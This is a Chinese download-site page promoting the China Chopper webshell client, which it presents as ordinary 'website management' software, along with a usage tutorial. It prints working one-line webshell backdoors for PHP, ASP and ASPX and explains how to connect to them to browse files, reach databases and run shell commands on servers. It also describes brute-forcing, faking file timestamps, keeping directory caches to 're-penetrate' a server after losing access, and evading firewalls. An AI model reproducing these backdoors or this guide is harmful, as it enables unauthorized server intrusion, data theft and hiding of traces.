软件标签: 中国菜刀 网站管理

黑客工具中国菜刀是一款非常实用的网站管理软件，无需安装就能帮助你管理自己打开的网站，还能设置虚拟终端，管理你的数据库，体积小不占内存！感兴趣的小伙伴快来当易网下载体验吧！

中国菜刀软件内容介绍

中国菜刀官方版是绿色无需安装的网络管理软件。它功能强大，其功能相当于ftp软件，并且隐蔽性非常的高，使用简单，小白也能轻松搞定。支持多种语言，可链接脚本是:php，asp，jsp，aspx。中国菜刀适合批量webshell网站，只需配置好，以后方便每次使用，批量的用户必备。有需要的赶紧来下载吧。

解压密码：http://www.zjjv.com/

中国菜刀电脑版特色细节

1.中国菜刀支持的服务端脚本：php、asp；

2.主中国菜刀要功能有：文件管理，数据库管理，虚拟终端。

文件管理

有足够的权限时候可以管理整个磁盘/文件系统，

数据库管理

这个是中国菜刀最最强大的功能，支持mysql,mssql,oracle,infomix,access等等数据库，支持不是最主要的，功能强大，人性化才是最主要的

“菜刀”的数据库操作界面，内置了常用的数据库语句，非常直观的表列名浏览功能，自动显示表名，列名，查询语句，非常人性化的设计，更内置了不少自建的函数，方便不懂数据库的菜鸟，都能查阅数据库里的数据

再说个“菜刀”数据库管理的一个小技巧，对于access数据库，可以在中国菜刀的webshell操作界面，对着mdb文件点右键，点access management，就直接进入access的数据库操作界面了，特别方便

虚拟终端

模拟的windowns下的cmd命令窗口如果服务器是linux那么就是shell窗口。

中国菜刀使用教程

1.常见的管理

右键空白处->添加

添加shell -> 进行相关的配置。

我的配置：

地址： http://localhost/a.php

密码：key

脚本类型：php

最后

->点击添加

相关的介绍：

这里的

webshell是我们常说的一句话木马：

php一句话木马：<?php @eval($_post['key']);?>

asp一句话木马：<%eval request['key']%>

aspx一句话木马：<%@ page language="jscript"%><%eval(request.item["key"],"unsafe");%>

眼尖的童鞋已经看到了三个里面都带有

key这个单词，没错这个就是密码，大家可以自行修改为自己使用的密码。

文件管理：

打开方式 [右键webshell->单击文件管理]

管理方式 [右键上图中方框内的任何区域进行管理]

数据库管理：

打开方式 [右键webshell->数据库管理]

可以看到是空白的，这时候就需要配置数据库信息了。

配置方式1.[单击配置]

出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)

我的配置信息：

数据库类型：mysql

用户名：root

密码：root

配置方式 2.[选择数据库]

可以看到红色方框那边有mysql、mssql、mssql2、oracle等数据库类型。

我是mysql的就选择mysql的示例：

配置后 [单击提交]：

管理方式：

虚拟终端：

打开方式 [右键webshell->单击虚拟终端]

红色方框里是系统的一些信息。我们在d:\http://www.zjjv.com//替换成自己的测试站点即可。

功能：

1.反向ip(reverse_ip)

2.爬虫(spider)

3.爆破(crack)

其他按照这些提示都应该能懂就不一一去说了。

3.浏览器功能

打开方法如图示意。

对着网页进行右击：

上图是一些浏览器方面的功能。

单击扩展功能:

可以进行cookie的修改。

同时也可以单击菜刀图标->浏览器：

可以进行选择：

代表开启 可以单击进行取消开启。

4.其他功能

第一：设置菜刀启动密码(防止自己的webshell泄露出去)

打开方式 [单击菜刀图标->单击设置启动密码]

点击是，就成功设置密码为test。

然后我们关掉菜刀再打开菜刀：

输入我们的密码再可以设置新的密码：

我相信着点英语难不倒各位也不解释了。

也可以把启动密码取消掉：

亮点优势

中国菜刀的文件管理功能非常人性化，文件夹和文件的图标完全模枋windows

文件日期，文件大小，文件权限，一目了然

尤其是修改文件时间功能，非常的方便

直接对着要修改时间的文件点右键,modify the file time，然后在文件的时间那栏，输入时间，回车，就修改完了

当然，菜刀的文件管理还有新建，删除，上传，下载，编辑功能，这些大同小异，就不一一细说了

不过有个功能，还是要重点说明的，那就是目录缓存功能

菜刀可以把浏览过的webshell目录都缓存在本地，这样可以方便下次访问的时候更加快捷

最重要的是，当哪天你的权限丢了，起码你还有对方服务器的文件目录结构，方便再一次渗透

主要功能

只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。

uincode方式编译，支持多国语言输入显示。

一、eval客户端部分

1）要了解的

服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。

支持的服务端脚本：php, asp，.net。

在服务端运行的代码如下：

php: <?php @eval($_post['pass']);?>

asp: <%eval request("pass")%>

.net: <%@ page language="jscript"%><%eval(request.item["pass"],"unsafe");%>

(注意: .net要单独一个文件或此文件也是jscript语言)

2）怎么用

在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。

1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;

2.虚拟终端：[特色]人性化的设计，操作方便;(输入help查看更多用法)

3.数据库管理：[特色]图形界面,支持mysql,mssql,oracle,infomix,access

以入支持ado方式连接的数据库。

(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)

注意：由于服务器的安全设置，某些功能可能不能正常使用。

3) 关于配置信息怎么填？

a) 数据库方面：

php脚本：

<t>类型</t> 类型可为mysql,mssql,oracle,infomix中的一种

<h>主机地址<h> 主机地址可为机器名或ip地址，如localhost

<u>数据库用户</u> 连接数据库的用户名，如root

<p>数据库密码</p> 连接数据库的密码，如123455

asp和.net脚本：

<t>类型</t> 类型只能填ado

<c>ado配置信息</c>

ado连接各种数据库的方式不一样。如mssql的配置信息为

driver={sql server};server=(local);database=master;uid=sa;pwd=123456

b) 其它方面：

添加额外附加提交的数据：应付这种情况：if ($_post['action']=='test'){@eval($_post['pass']);}

<o>action=test</o>

提交功能前先post额外的数据包：会话期间只提交一次。

<data>uid=user1&pwd=123456</data>

二、网站蜘蛛

织出一张网站的目录结构。

下载的列表文件存在桌面，右键菜单/载入url列表即可以根据地址得到目录结构。

三、定时提醒

当闹钟事使吧, 周期：每月/每周/每日/只一次。

四、快速启动

一些常用的快捷方式放在这里，可以指定用户身份运行程序。这部分数据是以加密存储的。

五、浏览器

地址栏输入help，更多精彩后续加入。

六、其它部分

等待加入。

附带工具

update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。

把wscdb文件整到当前目录，运行update.exe得到新的数据库文件caidao.mdb

把菜刀的数据库db.mdb替换掉即可。

编辑测评

中国菜刀是可远程链接webshell的工具，只要支持动态脚本的网站，都可以用中国菜刀来进行管理！软件已将发送封包加密已可过各种防火墙，白帽子首选软件!

更新日志

对软件功能进一步完善，bug修复。